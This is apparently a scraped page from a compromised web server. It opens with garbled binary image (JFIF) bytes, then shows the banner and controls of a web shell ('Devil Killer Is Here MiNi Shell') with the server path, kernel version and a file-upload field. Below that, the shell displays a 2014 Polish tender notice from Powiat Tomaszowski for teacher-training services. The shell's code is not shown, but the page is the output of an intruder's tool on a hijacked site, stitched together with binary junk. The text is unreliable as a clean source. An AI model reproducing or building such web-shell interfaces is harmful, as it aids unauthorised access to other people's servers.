JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140110/11568-N-2014.html

<p class="kh_header"><b>Tomaszów Mazowiecki: DOSKONALENIE NAUCZYCIELI 
 w ramach projektu pn.: Nowe jutro, lepsze jutro - kompleksowy system doskonalenia Nauczycieli i Dyrektorów w Powiecie Tomaszowskim</b><br>
<b>Numer ogłoszenia: 11568 - 2014; data zamieszczenia: 10.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat  Tomaszowski , ul. Św. Antoniego 41, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 44 7242127, faks 44 725 28 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-tomaszowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSKONALENIE NAUCZYCIELI 
 w ramach projektu pn.: Nowe jutro, lepsze jutro - kompleksowy system doskonalenia Nauczycieli i Dyrektorów w Powiecie Tomaszowskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie składa się z ośmiu oddzielnych części:
część I - doskonalenie nauczycieli - 1 (111 godzin)
Część nr 2 - doskonalenie nauczycieli - 2 (6 godzin)
Część nr 3 - doskonalenie nauczycieli - 3 (66 godzin)
Część nr 4 - doskonalenie nauczycieli - 4 (30 godzin)
Część nr 5 - doskonalenie nauczycieli - 5 (21 godzin)
Część nr 6 -  doskonalenie nauczycieli - 6 (123 godziny)
Część nr 7 -  doskonalenie nauczycieli - 7 (6 godzin)
Część nr 8 -  doskonalenie nauczycieli - 8 (45 godzin).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, wówczas gdy wykonawca posiadać będzie:

Część I - doskonalenie nauczycieli - 1 (111 godzin)
a) min. 200 godz. zrealizowanego wsparcia zbieżnego z tematyką określoną w  poniższej tabeli, (oświadczenie), 
b) min. 100 godzin doświadczenia we współpracy ze szkołami-przedszkolami, (oświadczenie), 
c) doświadczenie w pracy z dzieckiem w wieku przedszkolnym i wczesnoszkolnym, (oświadczenie),
d) doświadczenie w prowadzeniu szkoleń lub warsztatów dla osób dorosłych, (oświadczenie). 

L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Uczymy się bawiąc - techniki aktywne w pracy z dziećmi przedszkolnymi  	6
2	Metoda projektu w pracy z dziećmi przedszkolnymi	12
3	Skrzynia pełna różności - metody i ćwiczenia rozwijające twórcze myślenie dzieci przedszkolnych	12
4	Zabawy, pląsy w pracy z dziećmi w wieku 3-6 lat	6
5	Praca z uczniem metodami aktywnymi wspomagającymi osiąganie sukcesu. Rozwijanie twórczego i kreatywnego myślenia uczniów	6
6	Za siedmioma górami - wykorzystanie bajki i relaksacji w pracy  z dzieckiem	6
7	Pedagogika zabawy w pracy z małym dzieckiem	12
8	Możliwości psychofizycznych dzieci w wieku przedszkolnym w obliczu wymagań stawianych przed 6- latkiem	3
9	Pedagogika zabawy w pracy z dzieckiem w wieku przedszkolnym	6
10	Metody i techniki aktywizujące dzieci w wieku przedszkolnym	6
11	Nowatorskie metody pracy - metoda projektu - nabywanie umiejętności stosowania ich w codziennej pracy z dziećmi	6
12	Rola, sposoby i formy motywacji dzieci w wieku szkolnym wielopoziomowość nauczania
	3
13	Metodologia pracy z uczniem na różnych etapach kształcenia  (dobór metod pracy w zależności od  predyspozycji, wieku, możliwości intelektualnych uczniów)	3
14	Rola rodziny w motywowaniu dzieci do nauki na różnych etapach kształcenia	3
15	Jak pomóc uczniowi osiągnąć sukces?	3
16	Rozwój psychofizyczny i możliwości percepcyjne uczniów najmłodszych w szkole, higiena pracy dziecka w młodszym wieku szkolnym	6
17	Metodologia pracy z uczniem 6-letnim  ( dobór metod pracy) dla nauczycieli klas I- III oraz uczących przedmiotów- wychowanie fizyczne, języki, religia, wychowawcy świetlicy	3
18	Jak wspierać i motywować dzieci młodsze do nauki szkolnej	3
19	Jak pracować w klasach zróżnicowanych wiekowo	3
20	Gry i zabawy rozwijające umiejętności matematyczne	3


Część II - doskonalenie nauczycieli - 2 (6 godzin)
a) min. 200 godz. zrealizowanego wsparcia zbieżnego z tematyką określoną w  poniższej tabeli, (oświadczenie), 
b) min. 100 godzin doświadczenia we współpracy ze szkołami-przedszkolami, (oświadczenie), 
c) doświadczenie w pracy z dzieckiem w wieku przedszkolnym i wczesnoszkolnym, (oświadczenie),
d) doświadczenie w prowadzeniu szkoleń lub warsztatów dla osób dorosłych, (oświadczenie). 


L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Metoda Kinezjologii Edukacyjnej Dennisona w pracy z dzieckiem	6


Część III - doskonalenie nauczycieli - 3 (66 godzin)
a) min. 200 godz. zrealizowanego wsparcia zbieżnego z tematyką określoną w  poniższej tabeli, (oświadczenie), 
b) min. 100 godzin doświadczenia we współpracy ze szkołami-przedszkolami, (oświadczenie), 
c) doświadczenie w pracy z dzieckiem w wieku przedszkolnym i wczesnoszkolnym oraz 
z dzieckiem o specjalnych potrzebach edukacyjnych, (oświadczenie),
d) doświadczenie w prowadzeniu szkoleń lub warsztatów dla osób dorosłych, (oświadczenie).

L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Jak radzić sobie w sytuacjach konfliktowych?	3
2	Jak rozpoznać ryzyko specyficznych trudności w uczeniu się u dzieci z klas młodszych?	3
3	Zaburzenia zachowania i agresja u dzieci w wieku przedszkolnym	6
4	Jak pomóc rodzicom dzieci ze specjalnymi potrzebami edukacyjnymi	6
5	Praca z dzieckiem o specjalnych potrzebach edukacyjnych	3
6	Praca z uczniem słabym niezmotywowanym. Praca z uczniem zdolnym niezmotywowanym.	3
7	Praca z dzieckiem wycofanym	3
8	Motywowanie ucznia słabego do osiągania sukcesu	3
9	Motywowanie ucznia z trudnościami edukacyjnymi  do systematycznej pracy i do osiągania sukcesu na miarę swoich możliwości	6
10	Umiejętność rozwiązywania sytuacji konfliktowych w grupie  dorosłych i dzieci	3
11	Metody  pracy z dziećmi o różnych potrzebach edukacyjnych- wady wymowy, nadpobudliwość, orzeczenia o niepełnosprawności;  uczeń zdolny	3
12	Rozwój psychomotoryczny dzieci a potrzeby edukacyjne w wieku przedszkolnym	3
13	Jak interpretować rysunki dziecka?	3
14	Wspomaganie dzieci w rozumieniu tego, co trudne - w skupieniu uwagi, ćwiczeniu pamięci i wspomaganiu zapamiętywania informacji uporządkowanych	3
15	Stosowanie aktywizujących metod pracy na zajęciach z: języka polskiego, języka obcego, matematyki, edukacji wczesnoszkolnej, w-f, przyrody i techniki	6
16	Organizacja procesu lekcyjnego z uwzględnieniem zróżnicowanego poziomu opanowania wiedzy	6
17	Rozpoznawanie i wspieranie dziecka z dyskalkulią	3

Część IV - doskonalenie nauczycieli - 4 (30 godzin)
a) min. 200 godz. zrealizowanego wsparcia zbieżnego z tematyką określoną w  poniższej tabeli, (oświadczenie), 
b) min. 100 godzin doświadczenia we współpracy ze szkołami-przedszkolami, (oświadczenie), 
c) doświadczenie w pracy z dziećmi z zaburzeniami zachowania i emocji oraz deficytami rozwojowymi, (oświadczenie),
d) doświadczenie w prowadzeniu szkoleń lub warsztatów dla osób dorosłych, (oświadczenie).
L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Behawioralne metody pracy z dziećmi w wieku przedszkolnym. Jak motywować do działania, jak wyciszać niepożądane zachowania, jak radzić sobie z agresją? Praca w oparciu o konkretne przykłady i nowoczesne metody.	3
2	Motywowanie i angażowanie do działania dzieci z zaburzeniami zachowania lub specyficznymi trudnościami. Wypracowanie metod pracy z dzieckiem nadpobudliwym, z deficytami uwagi i nadmiernie wyciszonym, wycofanym emocjonalnie, mało aktywnym.	6
3	Behawioralne metody pracy z dziećmi w klasach 0-III. Jak radzić sobie z trudnymi zachowaniami i postawami uczniów	
4	Metody pracy z dzieckiem nadpobudliwym.	3
5	Praca z dzieckiem z zaburzeniami uwagi	3
6	Metody pracy grupowej z dziećmi z zaburzeniami zachowania	6
7	Jak pracować w szkole z uczniem posiadającym orzeczenie do kształcenia specjalnego z uwagi na upośledzenie umysłowe w stopniu lekkim	3
8	Metody pracy z dzieckiem dysfunkcyjnym	3


Część V - doskonalenie nauczycieli - 5 (21 godzin)
a) min. 200 godz. zrealizowanego wsparcia zbieżnego z tematyką określoną w  poniższej tabeli, (oświadczenie), 
b) min. 100 godzin doświadczenia we współpracy ze szkołami/przedszkolami, (oświadczenie), 
c) doświadczenie w pracy metodami behawioralnymi z dziećmi w wieku przedszkolnym 
i szkolnym, w tym z dziećmi ze spectrum autyzmu, (oświadczenie),
d) doświadczenie w prowadzeniu szkoleń lub warsztatów dla osób dorosłych, (oświadczenie).

L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Jak pracować z dzieckiem w wieku przedszkolnym ze spektrum autyzmu i z ADHD	3
2	Metody behawioralne.	6
3	Droga edukacyjna dziecka z autyzmem.	3
4	System kar i nagród w pracy z dzieckiem w wieku przedszkolnym. Jak dobierać i stosować kary i nagrody w procesie edukacji i wychowania. Praca w oparciu o konkretne przykłady i nowoczesne metody.	3
5	Jak motywować i angażować do działania dzieci z zaburzeniami zachowania lub specyficznymi trudnościami - wypracowanie metod pracy z dzieckiem z Zespołem Aspergera i autyzmem.	6



Część VI - doskonalenie nauczycieli - 6 (123 godzin)
a) min. 200 godz. zrealizowanego wsparcia zbieżnego z tematyką określoną w  poniższej tabeli, (oświadczenie), 
b) min. 100 godzin doświadczenia we współpracy ze szkołami-przedszkolami, (oświadczenie), 
c) doświadczenie w prowadzeniu szkoleń lub warsztatów dla osób dorosłych, (oświadczenie).


L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Komunikacja interpersonalna, asertywność, informacja zwrotna.	6
2	Efektywna organizacja zespołów nauczycielskich.	6
3	Jak skutecznie rozmawiać z rodzicami	3
4	Jak radzić sobie w sytuacjach stresowych i być asertywnym?	3
5	Problemy komunikacyjne w relacjach nauczyciel - rodzic dotyczące przekazywanych informacji o uczniu i możliwościach ich przekazywania.	3
6	Nauczyciel wobec trudnych postaw uczniów. Jak radzić sobie z agresją, nieposłuszeństwem, spóźnieniami, wagarami.	3
7	Znajomość najnowszych technik i metod skutecznej komunikacji do zastosowania w relacjach: nauczycieli - rodzic, nauczyciel - uczeń.	6
8	Praca metodami wspierającymi i motywującymi ucznia zdolnego. Rozwijanie kreatywności i twórczego myślenia	6
9	Umiejętności praktyczne dotyczące sztuki mediacji i negocjacji.	12
10	Wywiadówka bez porażek. Nie wiem jak pani powiedzieć.
Przekazywanie rodzicom trudnych informacji.	12
11	Metoda dialogu motywującego. Praca z trudnym uczniem.	18
12	Współpraca z dysfunkcyjną rodziną ucznia.	3
13	Poszerzenie kompetencji w zakresie komunikacji społecznej i  pracy zespołowej szkolenie	3
14	Motywacja  w pracy nauczyciela stres, elementy wypalenia zawodowego.  Jak sobie radzić 	9
15	Poszerzenie kompetencji w zakresie umiejętności komunikowania się w organizacjach - elementy treningu interpersonalnego	6
16	Najnowsze techniki i metody skutecznego rozwiązywania konfliktów w  społeczności szkolnej.	3
17	Strategia uczenia się - Jak uczyć efektywnie i ciekawie	6
18	Rozpoznawanie i wspieranie potencjału rozwojowego ucznia zdolnego.	3
19	Jak tworzyć i podtrzymywać motywację do nauki języka obcego?	6
20	Metody aktywizacji ucznia na lekcjach języków obcych.	3
21	Fabryka opowieści.	3


Część VII - doskonalenie nauczycieli - 7 (6 godzin)
a) min. 200 godz. zrealizowanego wsparcia zbieżnego z tematyką określoną w  poniższej tabeli, (oświadczenie), 
b) min. 100 godzin doświadczenia we współpracy ze szkołami-przedszkolami, (oświadczenie), 
c) doświadczenie w zakresie stosowania technik i metod pracy z dzieckiem z FAS, (oświadczenie).
d) doświadczenie w prowadzeniu szkoleń lub warsztatów dla osób dorosłych, (oświadczenie). 
3)	
L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1.	Techniki i metody pracy z dzieckiem z FAS i z niedostosowaniem społecznym 	6


Część VIII - doskonalenie nauczycieli - 8 (45 godzin)
a) min. 200 godz. zrealizowanego wsparcia zbieżnego z tematyką określoną w  poniższej tabeli, (oświadczenie), 
b) min. 100 godzin doświadczenia we współpracy ze szkołami-przedszkolami, (oświadczenie), 
c) doświadczenie w pracy z uczniami na III i IV etapie edukacyjnym,
d) doświadczenie w pracy z dzieckiem w wieku przedszkolnym i wczesnoszkolnym, (oświadczenie), 
e) doświadczenie w prowadzeniu szkoleń z zakresu technik szybkiego zapamiętywania, uczenia się i aktywizujących metod pracy, (oświadczenie),
f) doświadczenie w prowadzeniu szkoleń lub warsztatów dla osób dorosłych, (oświadczenie). 

L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Techniki efektywnego uczenia się i zapamiętywania.	9
2	Najnowsze techniki uczenia się, zapamiętywania i metody aktywizujące oraz narzędzia do motywowania.	15
3	Techniki nauczania oraz metody aktywizujące 	12
4	Psychologiczne aspekty motywowania uczniów do nauki 	6
5	Praca z uczniem o specyficznych trudnościach w uczeniu się	3</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że spełnia niżej wymienione warunki udziału,

osoba, która będzie uczestniczyła w wykonywaniu zamówienia musi posiadać minimum:

część I -
a) co najmniej tytuł mgr psychologii lub mgr pedagogiki, w zakresie pedagogiki wieku dziecięcego, - kserokopia dyplomu przy podpisywaniu umowy, 
b)	uprawnienia trenera i animatora czasu wolnego (lub animatora zabawy), kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy, 
c)	uprawnienia specjalisty ds. rozwijania inteligencji wielorakich, kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy, 

część II - 
a) co najmniej tytuł mgr psychologii lub mgr pedagogiki, w zakresie pedagogiki wieku dziecięcego, - kserokopia dyplomu przy podpisywaniu umowy, 
b) uprawnienia instruktora z zakresu kinezjologii edukacyjnej Dennisona, (oświadczenie), kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy, 

część III - 
a)	co najmniej tytuł mgr psychologii - kserokopia dyplomu przy podpisywaniu umowy,
b)	uprawnienia psychoterapeuty, kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy,

część IV - 
a) co najmniej tytuł mgr psychologii - kserokopia dyplomu przy podpisywaniu umowy, 
d) uprawnienia psychoterapeuty, kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy, 

część V - 
a)	co najmniej tytuł mgr psychologii  - kserokopia dyplomu przy podpisywaniu umowy, 
b)	kwalifikacje w zakresie terapii behawioralnej, kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy, 

część VI - 
a) co najmniej tytuł mgr psychologii - kserokopia dyplomu przy podpisywaniu umowy, 
b) uprawnienia trenera, kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy, 
c) uprawnienia coacha, kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy,

część VII - 

a) co najmniej tytuł mgr psychologii lub mgr pedagogiki, w zakresie pedagogiki wieku dziecięcego, kserokopia dyplomu przy podpisywaniu umowy, 
b) kwalifikacje w zakresie technik i metod pracy z dzieckiem z FASkserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy, uprawnienia

część VIII - 
a) wykształcenie co najmniej wyższe magisterskie z przygotowaniem pedagogicznym, - kserokopia dyplomu przy podpisywaniu umowy,  
b) kompetencje w zakresie technik szybkiego zapamiętywania, uczenia się i aktywizujących metod pracy, kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty i oświadczenia jakie Wykonawca będzie zobowiązany przedłożyć Zamawiającemu przed zawarciem umowy:
poświadczona kserokopia dyplomu potwierdzająca wykształcenie  oraz poświadczona kserokopia dokumentu potwierdzająca kwalifikacje Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Kadra i zasoby - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić w następujących przypadkach:
a)	dopuszczonej prawem zmian stron umowy lub oznaczenia stron umowy,
b)	zmiany wynagrodzenia w następstwie zmiany przepisów o podatku od towarów i usług (VAT),
c)	zmiany w zakresie przedmiotu zamówienia jeżeli konieczność wprowadzenia takich zmian jest skutkiem zmiany przepisów prawa,
d)	wynagrodzenie umowne może ulec zmianie w przypadku ograniczenia przez Zamawiającego zakresu przedmiotu umowy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy.
e)	Zmiany terminu realizacji przedmiotu umowy, która wystąpiła z przyczyn niezależnych od Zamawiającego i Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-tomaszowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
ul. Św.Antoniego 41, pokój nr 215
97-200 Tomaszów Mazowiecki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2014 godzina 10:00, miejsce: Starostwo Powiatowe
ul. Św.Antoniego 41, Kancelaria - parter
97-200 Tomaszów Mazowiecki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




